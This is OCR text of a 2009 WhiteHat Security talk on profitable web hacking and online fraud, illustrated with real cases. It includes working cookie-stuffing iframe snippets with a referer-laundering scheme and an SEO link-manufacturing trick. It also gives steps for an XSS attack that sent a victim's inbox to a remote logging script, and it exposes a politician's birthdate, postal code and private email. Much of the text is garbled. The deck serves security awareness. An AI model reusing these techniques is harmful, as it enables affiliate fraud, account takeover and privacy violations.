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A study conducted by the Verizon Business RISK Team 

2009 Data Breach 






V&tl OHbusiness 



http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/ 



Jer-Jitsu 



"The embodiment of converged IT and physical security. " 

- In formation Week 



of Solutions 
Architecture 

6 years as an 
information security 
consultant for 
Fortune 500s 

PCI-DSS 
Curmudgeon 

??? 
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TechCrunch Layoff Tracker 



Layoff Trend 

# of employees laid off 
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Last up date: July 3, 2005 
ray cits since Augu; 
Total Employees Lai doff: 340,066 




479 



1/09 



2/09 3/09 



4/09 



5/09 



6/09 



7/09 



PlanB 



WhiteHat 



Hacker Stimulus Package 



SECURITY 



© 2009 WhiteHat, Inc. | Page 6 



Get Rich or Die Trying, 2008... 





YoufB 



Four figures: Solving CAPTCHAs 

Five figures: Manipulating payment systems 

High five figures: Hacking Banks 

Six figures: Scamming eCommerce 

High Six figures: Defraud Affiliate Networks 

Seven figures: Gaming the stock market 



http://www.youtube.com/watch?v=SIMF8bp5-qg 



All still work just fine. :) 
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Vote on Austin's 



SHOW ME THE MONEY 




The target won't know 

How the breach was detected: 

• 3rd party detection due to FRAUD (55%) 

• 3rd party detection NOT due to fraud (15%) 

• Employee Discovery (13%) 

• Unusual System Performance (11%) 



Internal 
Active 



24% 

Interna 
Passive 




2009 Data Breach 
Investigations Report 



69% 
Third 
Party 



VGft^Mf business 
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Don't be that guy 




David Kernell, 20 year- 
old student University of 
Tennessee student, 
allegedly hacked into 
former VP candidate 
Sarah Palin's Yahoo Mail, 




Stephen Watt, TJX hack 
participant which the 
feds call "the largest 
identity theft in our 
Nation's history," AKA 
(Operation Get Rich or 
Die Tryin) 




Gary McKinnon, described as 
the 'UFO Hacker,' allegedly 
broke into United States 
military and NASA computers 
to find evidence of 
government-suppressed 
information. 



Attacker Targeting 

Random Opportunistic 

• Fully automated scripts 

• Unauthenticated scans 

• Targets chosen indiscriminately 

D ireCte d Opportune /J 

• Commercial and Open Source Tools 

• Authentication scans 

• Multi-step processes (forms) 

Fully Targeted 

• Customize their own tools 

• Focused on business logic 
> Clever and profit driven ($$$) 




irected 
ortunistic 



Full- 
Targe. 



RandoL. 
pportunistic 
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Holiday Grinch-bots 

eBay's "Holiday Doorbusters" promotion, administered by Strobe 
Promotions, was giving away 1 ,000 items — 2009 corvette, 
plasma TVs, jet skis, diamond ring, etc — to the first person to 
find and buy specially-marked $1 items. 



E2 



HOLIDAY 

DOORBUSTERS 



15 Days of deals ~* November 24 - December 8 



Some "contestants" used scripts, skipping to 'buy', without even 
viewing the goods. Almost 100% of the prizes were 'won' this 
way as evidenced by the visitor counters showing "0000," 



r% n n nn n n 

uuuuuuu 



Many were not happy and complaining in the forums. 
Disappointed with eBays response, some took matters into their 
their owns hands listing "other" items for $1 . 

"This is picture / took of my cat with my Cannon Powershot 
Camera after she overheard that people where using scripting to 
purchase HOLIDAY DOORBUSTERS items on eBay. Not 
^sponsible for poor scripting techniques." 




http://redtape.msnbc.com/2008/12/ebay-users-say.html 
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Recover someone else's 
password - it's a feature! 




WhiteHat 
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"Appropriate" access to Email 



WhiteHat 



Start with just 


an email address 






^xnoor 




Yahcc Heme - 


Help | 




Your Progress 


Ve rify y ou r i d e ntity ^ Res* 






Answer these questions to validate your identity 

We need to verify a few questions and we'll be done 














Birthday | . select Month - jj 


1 lYear 






Country of Residence (select one 


d 






Postal Code |~ 


Exit Wizard 




Next 
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Doing a little research 



3. In case you forget your ID or password... 



Alternate Email 



S e c u rity Question | Wh e re d i d y o u .m e et y o u r sp o u s e ? 
Your Answer 



- Select One- 



Just a couple more details. 



Where did you meet your spouse? 
What was the name of your first school? 
Who was your childhood hero? 
What is your favorite pastime? 
What is your favorite sports team? 
Type the code shown What is your father's middle name? 

What was your high school mascot? 
What make was your first car or bike? 
What is your pets name? 



i—. 
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or 'lots' of research 



Google 



"sarah palm" birthday 



f Search} 



Advanced Saarcn 
Prafergnce& 



Web 



Results 1 - 10 of about 1,480,000 for " sarah palin" birthday . (0.24 seconds) 



Sarah Palin — Date of Birth: February 11 , 1964 

According to http://wwAW.askmen.com/celebsMomen/model/sarah-palin/index.html - More sources » 



Account information used by the anonymous 'h activists': 



Sarah Palin account info 
gov . paii n £ y ahoo . com 
DOB 2/11/64 
SIP 996B7 

Todd Palin: 

f ek9wnr@ yahoo . con 

DOD: 9/6/64 

SIP 99654 
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and you've got MAIL 



>Wo7iLEa Ffrefcx 



Flit fefil ViiVi Htilori,.- f-cokm-rki Vihoo! Tool: Hop 



3! 



Y.' -£ 



Find Christian 
Singles 



-, Web - [J * gjj F-aJI TV - Ig] MaI - © My Vahra! ^J Mwra - Q Gums * Q Tuwl - ^3 France - L"J Amweirs - £j Spafts - » 

Previous | Next j Back to Messages Mark as Unread 1 Printable view * 



Edit] 



Folders [Add 
Q Inbox (84) 
^Drafts 
gfSerrt 

IS Spam (9) [Empty] 

u& Trash [Empty] 




Delete | Reply | Reply AM 



*■ Re: Looks like ft's my turn in dans crosshairs 
From: "gov , p ali n @ yahoo . Co rn" <: gov . palin@ya h oo.com > E3 
To: "Sean personal^" <sparnell@al3Ska.com> 



Thursday, July 24, zooe 2: 14 am 



My Folders 

Cl Emails for Arc. 



[Hide] 



Search Shortcuts 

oa My Photos 

*fi My Attachments 
AOVERTISeMENt 



fS 








CLk-kio -Ip**-- 
I discover " *— 



Arghhhh! He is so inconsistent and purposefully misleading! I om sorry Seen. He can keep laying, but you ore (he right 
one for the Congressional posh ion and he KNOWS it (last's the inconsistency!]... remember how he's said it sill only realty 
matters on matters like LIFE, honesty, ability, etc. all those things yeu are (as opposed lo attributes of your oppcnenls)? 
He knows you fit all of his, and censervajiivTss'j end Alaskans' criteria. His fighting you neveols some evil stuff going on with 
him. Does he want someone OPPOSED to the life issue in Congress? MOT capable of working with bath parlies? NOT 
experienced and capable and slanding strong on all the right issues'? 
I am so sorry he does (his, 

Original Message---— 

From: Sean personal 

Sender: Sean personal? 

To: Sarah's Personal Email 

Sent. Jul 23, 2008 5:40 PM 

Subject - Re; Looks like rt's my turn in don's crosshairs 

Yesterday, o-e I set the record slraighl on my ■*.!!. port :'crvji; and my 
ods, Fan on asked if I supported ACES I told him I did, gova my 
reasons why end now he's replaying it over and aver next to my ad 
where I tell people Tm far lower taxes, (which was my legislalive 
history, vigled against a stale income (ok, fought Tony's long range 
financial plan that included rive new ta>oes, didnt raise taxes when 
oil as at 9 dollars a barrel, cot spending instead.") 

It got ugVand will be, 



An BKceiptfrorn a mail between Paiin and Alaska's Sean Pa r nell 



£~1 
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"The most secure email 
accounts on the planet" 



strongwebmail 



To get into a StrongWebmail account, the account owner 
must receive a verification call on their phone. This means 
that even if your password is stolen, the thief can't access 
your email because they don't have access to your telephone, 



C-OTTTB9D B IIIHl 



i &«r4 J1J1C ii l>il L" -""- Vmvt ¥ Spd 



r 1 ' Mfr 1 W 5tVo;*ow* - On Um^FiQifcf - 





r,T:-i3V.itFT»i ca-n 



mJW " ^ ■ ri I CfTAfl ^bti Add 



r 1 1 H ~iHII^*IMlllll -r 
5ut**CT 5frPOtflflMfe«i.«tP *CCW4 C-r****d G|r[HlMj 

Frar 3cr»ftte'b»tLl.«B «««nmt- hin been crtaTed r«? 



ErtW* -^ilirrt- Wm*f- t«j*- 




ddVtil IIJUU | t±«tn*l . | Gt-JHHM 


r,-r^i rrn^r, 

ft 1* 

=-r 

111 

^1 Amw? VTft 
(2 tmrl 
§1 Efctti 
' dl' 


n Pjjfc ] OR M«lMvi 


UlT^^ 


:-» £-y»> B gv-«rt^*- ^ot. 





http://www.strongwebmail.com/ 



WhiteHat 



SECURITY 



© 2009 WhiteHat, Inc. | Page 19 



Break into my email: get $10,000. 
Here is my username and password. 

May 21, 2009 

Break into my email: get $10,000. Here is my username and password. 
Username: CEO @ StrongWebmail .com 
Password: Mustang85 

StrongWebmail.com is offering $10,000 to the first 
person that breaks into our CEO's StrongWebmail 
email account. And to make things easier, Strong 
Webmail is giving the username and password away! 



http://www.strongwebmai I .com/ news /secure-web-mail /break-i nto-my- 
email-get-10000-here-is-my-username-and-password/ 
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Lance James 



SECURITY 




s ^as jcg 1 " 





http://twitpwn.com/ 




AppHcalion 
5ecur/Jfy Specialist 




http://www.asscert.com/ 
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The easiest route 

1 ) Registered an account and identified multiple XSS issues in 
a matter of minutes (Rackspace WebMail software). 

2) Sent ceo@stronqwebmail.com an email laced with specially 
crafted JavaScript malware 

3) Emailed support(S)stronawebmail.com stating they won the 
contest and sent details to the CEO encouraging them to 
check the account. 

4) Within minutes the email were opened, which initiated 
several Ajax requests to the server, pilfering the inbox, and 
sending the data to a remote logging script. 



http://skeptikal.org/2009/06/strongwebmail-contest-won.html 
http://www.fireblog.com/exclusive-interview-with-strongwebmails-10000-hacker/ 
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The easiest route 
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http://skeptikal.org/2009/06/strongwebmail-contest-won.html 
http://www.fireblog.com/exclusive-interview-with-strongwebmails-10000-hacker/ 
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TELESIGNCOflF 



Bank of America 





Strong Webmail said it was "not deterred" by the 
contest's quick conclusion and would be launching a 
new competition once this bug was fixed. "We won't rest 
until we have created the most secure e-mail in the 
world," the company said. 
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Twitter Hacker 

Hacker Croll initiates a password recovery for a Twitter 
employee's Gmail account. Reset email to secondary 
account: ******@h******.com. 



Guesses secondary Hotmail account, deactivated, but is able 
to re-register the account. Resends the reset email and bingo. 



Gm il 



■.yUiKJgtC 



BETA 



Windows Live 
Hotmail. 



Pilfers inbox for passwords to other Web services, sets the 
Gmail password to the original so employee would not notice. 

Used the same password to compromise employee's email 
on Google Apps, steal hundreds of internal documents, and 
access Twitter's domains at GoDaddy. Sent to TechCrunch. 



k. 




Owned! 



Personal AT&T, MobileMe, Amazon, Tunes and other accounts 
accessed using username/passwords and password recovery 
stems. 

"I'm sorry" - Hacker Croll 




http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/ 
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Promo codes for cheapskates 



X% and $X off sales 
Free Shipping 
2 for 1 Specials 
Add-Ons & Upgrades 



tWW 


^OBLE®POKET| 


ENTER COUPON CODE 
DURING SIGNUP 

ill in your data and press the 'Create' button. 


First Name: ^^^^^^^^^^^^[ 


Last Name: ^^^^^^^^^^^^B| 


^^^^^^^^^^^^Bl 




I ||USD zi 


1 ||top5QQ 
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MacWorld Hacker VIP 

Client-Side Hacking 

Back to Back Free MacWorld Platinum Pass 

($1 ,695) 





KG ENTERPRISES 

SAN FRANCISCO CA 

iillllllllljll 



PLATINUM 
PASS 



© deal mac* 

■™ UM,i Macwurfif 






K G 

ECdflirp 



PLATINUM PASS & rPHONE 



Macworld 

cool ischnoJogy conference. 



& 



M 1"l Tb» 

-J 5 S-n 



tt . , , ,m |3 L_ 

WnriinM 

M.n Ki'-I -alii'i-" 
Franniwa, C* 
MICH 

Microsoft 




PLATINUM PASS 




http://qrutztopia.jinqojanqo.net/2007/01/your-free-macworld-expo-platinum-passj 
http://qrutztopia.jinqojanqo. net/2008/0 1/another-free-macworld-platinum ^ 
http://qrutztopia.jinqojanqo.net/2008/02/your-client-side-sg 
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Free Pizza Tastes Better 

March 31, 2009... 

1 . Go to the Domino's Pizza site. 

2. Order a medium one-topping pizza. 

3. Enter coupon code "BAILOUT" FREE! 

Still have to go pick it up! 



ORDER MENU COUPONS LOCATIONS TRACKER 




Domino's Accidentally Gives Away 11,000 Pizzas in 
Promotion 



Home > News > Trie Cheapskate 

the cheapskate 

Kit k Ercida -t »ilt> the Web for great deals cm lech 




March 31. 2009 5:05 AM POT 







Get a free one-topping pizza from Domino's 

byRJckBmida QQ Font size fl Prinl [Ml E-mail % Share P 57 comments 



This mofiwwj, Rick Brmdc 
from ubiquitous ek&i d% 

CJieapsLar* blog on Cfff Because pizza is the single greatest food ever devised by 
g£ 4 ri*r OfiHOWW»0 |i mar1, ' ' nternj Pt your regularly scheduled Lech bargains to bring 
by araenng artne and u 
BAILOUT, 



The picdian It newer vn 
£ r*7jl promotion 

The anginal coupon cod 
End and? cttqt by one or 
Eventually, individual f rar 

.-■•■■ r HM Mi-li • -^: -.!-■ 



you his: Do tin no' s s offer i ng a fre e mad: urn or - a - topp i ng p i zz a . 
(See updales below.) 

The catch, if you can call il that, is ihal you'll have to hop in the 

car; it's carry-out only. Here's how to get the deal: 

1 Head to the Domino's Pizza site 

2. Click Order, then type in your address lo find stores near 
you. 

3. Choose the store you want, then create your order for a 
medium one-lopping pizza. 

4. Use coupon code BAILOUT Presto: free, free, free! 

I'm nnr rum nrhnn iihfl^Mbjaaiia^flayl^b^adan^&^i^^^ 
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http://consumerist.com/5193012/dominos-accidentally-qives-away-11000-pizzas-in-bailout-promQt 



cnet.com/8301-13845 3-10207986-58.html 

nfCMnn rnnoc / 1 7Q7 tV 
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Share the Knowledge 



1 1 ,000 X $7.00 = $77,000 



"Spoke to a Domino's rep, who 
told me the free-pizza code 
was created internally for a 
promotion that was never 
actually green-lit " 
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Scams that Scale 



They make money, a little or a lot. 



Generally not considered hacking, 



Can do them over and over again 



Cookie-Stuffing 



Instead of using affiliate links the "traditional" way: 

<a href =" http: //Af f iliate Network/p? 

program=50&affiliate_id=100/">really cool product !</a> 

Force affiliate requests with "Cookie Stuffing": 

<iframe src=" http; //Af f iliate Network/p?proaram=5Q&af filiate id=10Q/" 
width="0" height="0"></iframe> 

Remove pesky referer by placing code on SSL pages: 

"Clients SHOULD NOT include a Referer header field in a (non-secure) HTTP request if 
the referring page was transferred with a secure protocol." - RFC 2616 



Affiliate networks will get suspicious of 
all these requests with no referers 
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Referer Manipulation 



High traffic site, owned by the SEO and unknown by 
Affiliate network. FRAME the site with "clean" referer. 

<i frame src=" http: //niceseo /" width="0" 
height="0"></iframe> 



Clean site, also owned by SEO, serves up cookie- 
stuffing code only to requests with referer of the 
black-hat website. 

<i frame src=" http;//Affiliate Network/p? 
program=50&affiliate_id=100/" width="0" 
height="0"></iframe> 

To the affiliate Affiliate network everything looks 
1 00% legit when investigating. They will never see 
cookie-stuffing code. Mind the impression ratio! 




Link Growth ProFilea 
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Manufacturing Links 

Identify websites with a high PR or traffic, with 
site: search features, whose link results do not 
have "nofollow", URLs block by robots.txt, and do 
not redirect. 




"Powered by Google", but others may work as well. Use a link farm 
to link to search results pages so they get indexed. 

<a href =" http:/ /www. weather.com/search/websearch? 
KeYwords=site;mysite.com+keYword&start=0&num=10&twx=on&tYpe=web yy > 
keyword pair</a> 
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Google Maps vs. Spammers 




Local business results for emergency locksmith near New York. NY 

PSflT SJ A Locksmith NYC iM6l 303-3232 Emergency Locksmith 24 Hour 

www. locksm Hh-9i1.com ■ (866) 620-2929 ■ ' 
&. New York Locksmith ■' Emergency (gfefri 9Er2-fl787 New York - 

ywu locksmilhsewce info - (SB8) 992-B7&7 - 
C. LOCKSMITH a.66j992 3787 NEW YORK Emergency Service 
]j J ^Tsn | twn"« | www.locksmi1h-911.com '(866,1 2; 2-6287 -L 

<0*^ Locksmith MYC lB56> 303-3732 Emergency Locksmith 34 Hour 
.-.v.v.- £ .: hoi> rs -loc kSfn i| h <tw - l366j 303-3232 - 
. LOCKSMITH 866-992-8787 NEW YORK Ema-raencv Sefv<ce - 
WWW locksmith-311 Corn - (665) 637-6024 - ' 
M^>"« LOCKSMITH 866-992-8787 NEW YORK Emergency Service - 
...■-.-. locktmlth^m com - (£66) 2&2-9705 - ' 
Locksmith in NYC 856-303^3232 Emergency 2*1 Hours - 
wvww 2 i! hours -locksmilh com - [&66) 303-3232 - 
LocfawiHh 866-992*8787 Hwt York EmoroaflCtf Service - 
WWW, loe ksm iUl-9 1 1 . com - (877) 807-58 1 2 - More 
LOCKSMITH 8K--992-B787 MEW YORK Emergency Sejvice - 
www. locksmith <y I com ■ (866) 736-0963 ■ 
Locksmith 8&5-99Z-S7H7 NftW York Emergency S&rvicfr - 
hVW a- locksmith-?': 1 .com - (877) 87&-&71D - : 
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\J&* Mam resells near New Yarfc. NY 
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http://blumenthalsxom/blog/2009/02/25/google-maps-vs-locksmiths-spammers-spammers-winni j^ 
://thehollytree. blogspot.com/2008/02/scam-alert-phony-israeli-owned .html 
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i^ — - Google Local Business Center 

New 1 Now offering a reporting dashboard. Learn how people find your business. 




ers 



► :* 



Write a review 



144B Willard St 

San Francisco. CA 94 11 7-3721 

(415)375-7680 

Get directions! To here - From here 
Add or edit your business 



Csffoma 



di s«J °-' l ^ 1 ln>l 

5oogl& Map data ©2CCS T do Atlas - TerrtyfigfrElsfl 



Help customers Tina you on ooogie, n s Tree. 




Free listing 

Local customers already search 
Google for the products and 
services you offer. Create a 
business listing to be sure they 
find you. 

Lp.// I^MUI I I V— I III IU U. V-,\-/l I 




*" 



V^Vj/ £-\J\J ~/ J \J£-j *-->! ^ 



Free updates 

Keep your address, phone 

number, hours of operation, and 

more up-to-date. Even create 

coupons and display photos and 

videos, all for free. 

K dmmers-spammers-winr 



iumj v J lu^rxjiiiiLiu J|. 
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Google Earth Recon 

Roofer Tom Berge used the aerial photographs of 
towns across the world to pinpoint museums, 
churches and schools across south London with 
lead roof tiles (darker colour). 

Berge and his accomplices used ladders and 
abseiling ropes to strip the roofs and took the lead 
($164,980) in a stolen vehicle to be sold for scrap. 

Sentenced to eight months in prison - suspended for 
two years - after confessing to over 30 offenses. 





$72,000 




$72,000 
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http://www.independent.co.uk/news/uk/crime/thief-googled-163100000-lead-roofs-1645734.html 
http://www.telegraph.co.uk/news/uknews/4995293/Google-Earth-used-by-thief-to-pinpoint-buildm j 
ible-lead-roofs.html 
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Returning other people's iPods 






Nicholas Arthur Woodhams, 23 from Kalamazoo, 
Michigan set up shop online to repair iPods. 

Abused Apple's Advance Replacement Program 
by guessing iPod serial numbers backed with 
Visa-branded gift cards ($1 pre-auth). 

Repeated the process 9,075 times, resold the 
"replacements" at heavily discounted prices ($49), 
and denied any Apple credit charges. 

Charged with trademark infringement, fraud, and 
'-laundering. 

http://www.computerworld.com /action /article.do?command=viewArticleBasic&articleld = 9 130 136&intsrc=news ts head 
http://www.macworld.com/article/139522/23yearold michigan man busted for ipod fraud.html 
Ji ttp://www.appleinsider.com/articles/08/06/26/apple makes example of ipod repairman in lawsuit.html_ 
mi ngmoney.blogspot.com/ 2009 /03/money-laundering-charges-for-kalamazoo.htr 
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Scams that scale 

"Federal prosecutors have asked U.S. District 
Court Judge Robert Bell to let them seize real 
estate and personal property -- including a 2004 
Audi and a 2006 drag racer -- as well as more 
than $571,000 in cash belonging to Woodhams, 
all alleged to be proceeds from his scam." 




$72,000 




$72,000 




S 1 




S360.000 






WhiteHat 



SECURITY 



© 2009 WhiteHat, Inc. | Page 40 



Jackpotting the iTunes Store 



A group of U.K.-based DJs provided 19 songs, to distributor 
Tunecore, who put them for sale on iTunes and Amazon. 

Once online, the DJs opened accounts with 1,500 stolen 
or cloned US and British credit cards to buy $825,000 

worth of their albums $10 at a time over a couple month. 






Apple and Amazon paid roughly $300,000 in royalties, 
which boosted their chart rankings, resulting in even 
more sales and increased royalties for the DJs. 

Apple received 'stop payment' orders from credit card 
companies, which led to the DJs' arrest on suspicion of 
conspiracy to commit fraud and money laundering. 



http://www. metro. co. uk/news/article.html?DJs arrested in 
%A3200,000 iTunes scam&in article id=682928&in page id = 34 
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Mythical Super Hacker 



Anyone can do this stuff! 



Skill does not affect return on 

investment. 



Competitors got caught because they 

didn't try not to. 



Will Hack for $, £, ¥, €, R$, Rs 




msfi 

Hotmail 



* 1&B nor* irTic ■ II1M iMrainfs - hiflo meramre 



e-goid 

— — — — 
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Online Permit Management 

In 2006, the Brazilian environment ministry did away with 
paper dockets and implemented an online program to 
issue permits documenting how much land a company 
could legally log and tracking the timber leaving the 
Amazon state of Para. 




"We've pointed out before that this method of 
controlling the transport of timber was subject to fraud. " 



Andre Muggiati 

Campaigner Amazon office in Manaus 

Greenpeace International 
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Amazonian Rainforest Hack 



Allegedly 107 logging companies hired 
hackers to compromise the system, 
falsifying online records to increase the 
timber transport allocations. Police 
arrested 30 ring leaders. 202 people 
are facing prosecution. 

As a result, an estimated 1.7 million 
cubic meters of illegal timber have 
been smuggled out of the Amazon, 
enough to fill 780 Olympic-sized 
swimming pools. 




t Aoaui GrenrociL-t 

>■ Wh*t *i da 

*■ Greenpeace mid tin 

* Derate 



Hackers help destroy the Amazon rainforest 

II :--Lci'iL"-r 20QB ' Pr»rrt yend En n Meml 



Brazil — High-tech trnuggllJig 
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tracking tvstem end fiddle trie 
record i. 
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k certain amoura c* timber every year am this is coiyi oiled by he use or 
I l-di'iEJirl permit* issued by "I'E =3rf.e government' 5. conrputisr iyiJ.CT 
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http://www.greenpeace.org/international/news/hackers-help-destroy-the-amazo 
http://www.scientificamerican.com/blog/60-second-science/post.cfm?id = hackers-help-loggers-illegally-stri-2008-12-16 
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$833,000,000 



Same computer system is used in 
two other Brazilian states. 



http://www.greenpeace.org/international/news/hackers-help-destroy-the-amazo 
http://www.scientificamerican.com/blog/60-second-science/post.cfm?id = hackers-help-loggers-illegally-stri-2008-12-16 
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Online Permit Managers 



IN.gov 



III II ■!■ \ 
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I'Twirr^a* AniDLirtiEiil " 



KiLUQi] Th.rcj.1 AdvLury: 




Permit 

1 If raj^ty ic „j&fl4y nnliiws pta j* 4 hivi !lu r&fiawuia, ljins«n Jiliyi rtidy: 

■ UHbrmabon nboj1ineOfninu.TlDn Shlpn-«nlC-an-*r. anUStiipF^.-,! 

J, Oil** mpOTint rt af iwiiflo wtitn Hog eh* «4m ippfeiitw; 

■ Keep aE Bib in Pom a ton al tiand whon fting. If Bin aeh jppliuten Bmos joj oul f&j 
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Welcome to the Open Burning Permit Online 
Purchasing Service 

"The Maine Fewest Service is phased to offer dtdens tlie option 
tn purchase open burning permits on line! Th rough nur easy 
online process VOU will be able- to purchase an open burning 
permn 24 hours a day r 7 days a wee*,, providing permits are 
being issued at the time. Although on line bum permits can, be 
purchased at any lime and are technically valwd far 4& hours 
afterpayment has been submitted, open burning can only 
be conducted after 5pm end before Sain, unless, tubers a 
steady rain or the ground is completely covered with snow, 
re burning in, there are same 
read the minimum 
uMly before starting your Tire. 
rfnent by cnedit card is quiet 
It you r perm it at the en d of 



DnHnt ippt4«ll4f* for Hiiarftut MiriW Twttperi p»rm! 
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Strip to content 

Welcome 



English Cestina Dansk Deutsch Eesti Espaflol 

Enm ca j j Is fensh a Itajjano H 3il n . ft;3-<H L atviqsM 

Lifetuviu Magyar ftederlands Norsk Portuoues Slovenfrna 

Siovenscina Stiomi Sv.er.ska 

Welcome to the Electronic System for Travel Authorization Web Site. 

International trawlers who are seeking to travel bo the United States under the Vfsa Waiver 
Program are now subject to enhanced security requirements. All eligible travelers wtio wish to 
travel under the Visa Waiver Program must apply for authorization using the following process; 
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Hiring the Good Guys 




KPMG audited 70 FAA Web 
applications and identified 
763 high-risk vulnerabilities 



"By exploiting these vulnerabilities, the public could 
gain unauthorized access to information stored on 
Web application computers. Further, through these 
vulnerabilities, internal FAA users (employees, 
contractors, industry partners, etc.) could gain 
unauthorized access toATC systems because the 
Web applications often act as front-end interfaces 
(providing front-door access) to ATC systems. " 




Security 



Report: Hackers broke into FAA air traffic control 
systems 

HiKkefB have tuafcdfi ipIq the- 1J1 Tame c>j<iLt-&4 JTvaalDrvaugpcrl vyslrrns oftte U 5 Fedoral Avuv>i AdrnirutraUwi 
•mramf bmn hi ra«nt yowi. arccnlinp Id an JnswcWc GwibtbI rspol wnl Id ttt KM ffin ww-*, 

iriF*biu*rr, hichwi cronpcrniuijiH FAAt=uuir.-riuft|] enmpum- ind UMdtfiegim «^ » m ip pa regally 
■■JcrbM JtJe- inrofTTiBdon. Hooh » Social Security nLmifcera, an JQ.COD cunwil and Iwmtf FAA anxiaiaea, lha 



Lid f*ni . h JLhci itch lli-t iA dt FAA cratdJ ra?»:>4h ktNt'i wvd caula hiy» tfiLn nitrm dentin, *him aould hiMd 
usriiuilY Uiiju^-pU Hi* B |j-tic> * mi««ii.ri i^ir**"! iuriMtrh. Iln larpcul uiil HblJlhi* iuok ut«i FAA anvAmhi 
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Memorandum 



U.S. Department of 

Transpoftalton 
Office of the Secretary 
of Transportation 

Office of li'iidtb^ G*ne«l 



&** May 4. 2009 



Reply to 

Attn of JA-2U 



ACTION" : Report on Review of Web 
Application* Security and Intrusion Detection 

in Air Traffic Control Systems 
R eport Number : FI-2 Q9-&49 

Rebecca C Leng (jd-{<.4<^. /&S? 
Assistant Inspector General for FrMncial 

and Information Technology Audits 

Acting Federal Aviation Administrator 



This report presents the results of our audit of Web applications security and 
intrusion detection in air traffic control (ATC) systems, Thi^ audit w^ requested 
by tlie Rankius Minority members of (lie House Committee on Transportation and 
Infrastructure and its Aviation Sub committee, 
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http://news.cnet.com/8301-1009 3-10236028-83.html 
http://www.darkreadinq.com/security/qovernment/showArticle.jhtml 
http://www.oiq.dot.qov/StreamFile?file = /data/pdfdocs/ATC Web Reports 
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Security Religions 



Measure Website Security, some say... 

Focus on the most important assets, test comprehensively, and get to the rest later. 
Defend against the Fully Targeted (Super Hacker). While others... 

Recommend a minimum baseline for all assets, then test more thoroughly when 
resources allow. Defend against the Random Opportunists (Bots and Worms). 



fully 
targeted 



directed 
opportunist 

random 
opportunist 



website inventory 




fully 
targeted 



directed 
opportunist 



random 
opportunist 



website inventory 



high priority medium priority 




high priority medium priority 
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Success requires FLEXIBILITY to perform both 
comprehensive and scaled out testing in accordance 
with the organizations tolerance for risk. 
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Attack Classification Misnomer 

Dial is a measurement of target focus, NOT skill. 



No shortage of weak websites. 
Forgetting to 'not get caught'? 
Learning 'super hacker' skillz? 
Plenty of money still to be made 
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'Plan B' Problems 
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Jeremiah Grossman 

Blog: http://jeremiahgrossman.blogspot.com/ 
Twitter: http://twitter.com/jeremiahg 
Email: jeremiah@whitehatsec.com 

Trey Ford 

Blog: http://treyford.wordpress.com/ 
Twitter: http://twitter.com/treyford 
trey.ford@whitehatsec.com 
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